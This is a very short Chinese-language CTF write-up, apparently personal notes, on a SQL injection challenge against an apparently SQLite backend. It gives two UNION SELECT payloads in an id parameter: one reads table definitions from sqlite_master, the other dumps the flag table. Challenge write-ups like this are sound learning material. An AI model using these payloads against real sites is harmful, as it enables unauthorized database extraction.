这里测出来有5个字段,用database查库的时候一直报错,这里可能用的是SQLite使用
?id=-1 union select 1,2,3,4,(select sql from sqlite_master limit 0,1 ) –+查到flag
然后获取flag
?id=-1 union select 1,2,3,4,group_concat(flag) from flag–+
SQL
2026/2/6